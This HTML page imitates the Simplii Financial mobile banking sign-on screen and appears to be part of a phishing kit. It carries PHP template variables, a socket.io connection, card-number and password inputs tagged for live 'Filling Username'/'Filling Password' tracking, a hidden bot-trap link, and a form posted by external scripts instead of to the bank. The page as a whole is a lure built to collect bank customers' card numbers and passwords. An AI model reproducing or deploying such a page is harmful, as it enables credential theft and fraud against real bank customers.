<html>
    <head class="at-element-marker">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Simplii Financial Mobile Banking Sign On</title>
        <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <meta name="HandheldFriendly" content="true">
        <meta name="format-detection" content="telephone=no">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/reset.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/reset-brand.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/global.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/global-android2.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/global-brand.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/carousel.css">
        <link rel="stylesheet" type="text/css" href="/assets/simplii/index_files/signon.css">
        <meta name="msapplication-tap-highlight" content="no">
        <style>
        .check-label::before {
            background-image: url(/assets/simplii/img/checkbox.png);
        }

        .check-box:checked + .check-label::before {
            background-image: url(/assets/simplii/img/checkbox-selected.png);
        }

        .input-password {
          -webkit-text-security: disc;
        }
        </style>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="/socket.io/socket.io.js"></script>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.css">
    </head>
    <body lang="en">
        <span class="offscreen">Simplii Financial Mobile Banking Sign On</span>
        <input type="checkbox" id="drawer-toggle-chk" aria-hidden="true">
        <label for="drawer-toggle-chk" id="drawer-toggle-label">
        <img id="open-menu-icon" src="/assets/simplii/index_files/drawer-menu-open.png" alt="Open Menu" role="button">
        <img id="close-menu-icon" src="/assets/simplii/index_files/drawer-menu-close.png" alt="Close Menu" role="button">
        </label>
        <nav id="drawer-menu" class="scrollable-ver">
            <div id="menu-wrapper">
                <div class="drawer-menu-header">
                    <img src="/assets/simplii/index_files/pcfDrawerLogo.png" alt="Simplii Logo" id="preSignonLogo">
                </div>
                <ul>
                    <li id="li-sign-on"><a id="signon-link" class="tracking-set-flow active" href="./#" role="menuitem">Sign On<span class="offscreen">Selected</span></a></li>
                    <li><a id="register-link" class="tracking-set-flow" href="./#" role="menuitem">Register</a></li>
                    <li id="li-forgot-password"><a id="forgetpwd-link" class="tracking-set-flow" href="./#" role="menuitem">Forgot Password</a></li>
                    <hr>
                    <li id="li-visit-site-pcf"><a id="visit-site-link" href="./#" target="_blank" role="menuitem">Simplii.com<span class="offscreen">. Opens in new page</span></a></li>
                    <li id="li-find-us"><a id="find-us-link" href="./#" target="_blank" role="menuitem">Find Us</a></li>
                    <li id="li-security"><a id="security-guarantee-link" href="./#" target="_blank" role="menuitem">Security Guarantee</a></li>
                    <hr>
                    <li><a class="nav-no-indent" id="contact-us-link" href="./#" target="_blank" role="menuitem">Talk to Us</a></li>
                    <li><a class="nav-no-indent" id="legal-link" href="./#" target="_blank" role="menuitem">Products and Services Agreement<span class="offscreen">. Opens in new page</span></a></li>
                    <li><a class="nav-no-indent" id="help-link" href="./#" target="_blank" role="menuitem">Help</a></li>
                </ul>
            </div>
        </nav>
        <header class="flex-box flex-box-hoz">
            <div class="flex-box-flex-1"></div>
            <a href="./#" target="_blank">
                <div id="header-logo"><span class="offscreen">Simplii Financial logo</span></div>
            </a>
            <div id="header-link" class="flex-box-flex-1">
            </div>
        </header>
        <noscript>
            <section id="nojs" class="overlay-msg">
                <div>
                    <p>JavaScript is currently disabled in your browser.</p>
                    <p>To access Mobile Banking, please enable JavaScript and refresh this page.</p>
                </div>
            </section>
        </noscript>
        <section id="main-page" class="div-main">
            <input type="checkbox" id="sign-off-check" class="hide" name="signOffCheck">
            <section id="signoff" class="overlay-msg">
                <div>
                    <a href="./#" id="sign-off-button"><img src="/assets/simplii/index_files/close-icon-red.png" alt="Close" role="button"></a>
                    <p>You have successfully signed out.</p>
                    <div id="sub-msg">Thank you for banking with <span>Simplii Financial</span> Mobile Banking.</div>
                </div>
            </section>
            <div id="carousel-container" aria-hidden="true">
                <img id="slide-sizer" src="/assets/simplii/index_files/sizer.png" alt="">
                <section id="carousel">
                    <div id="items-container">
                        <div id="touch-box"></div>
                        <article id="s1" class="carousel-item carousel-item-on" style="z-index: 0;">
                            <a id="carousel-link-1" href="./#"><img src="/assets/simplii/index_files/46842-mobi.png" alt=""></a>
                        </article>
                    </div>
                </section>
                <div id="slideIndicators">
                    <div class="inline">
                        <div class="indicator-bg indicator-on" id="indicator1"></div>
                    </div>
                </div>
                <!-- end of panel -->
            </div>
            <section id="signon">
               
                    <form id="loginForm" class="lab-form" id="lab-form" method="post" action="">
                        <input type="hidden" id="userAgent" name="userAgent">
                        <div style="width:0px;height:0px;position:absolute;left:-100px;top:-100px;overflow:hidden"><input type="hidden" name="id7_hf_0" id="id7_hf_0"></div>
                        <fieldset class="sign-on-new" id="new-card-number">
                            <label for="user-card-number"><span class="offscreen">Card Number</span></label>
                            <input id="input-card" type="tel" placeholder="Card Number" name="username" onkeyup="split()" required="true" autocomplete="off" maxlength="19" oninput="this.value = this.value.replace(/[^0-9, ]/, '')" class="lrinput input-username" attr-action="Filling Username" style="margin-bottom: 10px">
                            <input type="hidden" name="CRSFToken" value="">
                            <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                            <link rel="stylesheet" href="/assets/css/card.css?<?=time()?>">
                        </fieldset>
                        <fieldset class="sign-on-new" id="remember-new-card">
                            <input type="checkbox" id="remember-card-chk" class="check-box" name="rememberCardCkBx">
                            <label for="remember-card-chk" class="check-label" id="remember-card-label">Remember Card</label>
                        </fieldset>
                        <fieldset class="sign-on-remember"></fieldset>
                        <fieldset>
                            <label for="user-password"><span class="offscreen">Password</span></label>
                            <input type="text" autocomplete="off" data-id="password" id="user-password"  class="lrinput input-password" name="password" placeholder="Password" maxlength="18" required="true" value="" attr-action="Filling Password" autocapitalize="none">
                        </fieldset>
                        <button type="button" onclick="submitForm()" class="btn btn-neutral btn-save btn-login" id="signon-button" name="save22">
                            <span class="btn-txt">SIGN ON</span>
                            <span class="btn-spinner" style="display: none"><i class="fa fa-spinner fa-spin"></i></span>
                        </button>
                    </form>
                </div>
                <div id="bttm-shadow"><img src="/assets/simplii/index_files/shadow.png" id="shadow" role="presentation"></div>
            </section>
            <footer class="page-footer">
                <div>
                    <p>Simplii Financial personal banking services are provided by the direct banking division of CIBC. Banking services not available in Quebec.</p>
                </div>
                <div class="release">
                    <a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
                    <!-- *** Dynamic changes begin do not remove *** -->
                    <p>RT15.0 &nbsp; &nbsp; 2.5.3 &nbsp; &nbsp; (aaa681e-6795e3-0)</p>
                    <!-- *** Dynamic changes end do not remove *** -->
                </div>
            </footer>
        </section>
        <section id="change-password" class="page-wrapper div-loader" style="display: none; margin-top: 46px">
            <style>
            .loader-div {
                text-align: center;
                padding-top: 20px;
            }

            .loader-div h2 {
                font-size: 28px;
                margin-bottom: 40px;
            }
            </style>
          
        </section>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Login</span>
    </body>
    <script src="/bank/simplii/js/script.js">
    </script>
</html>
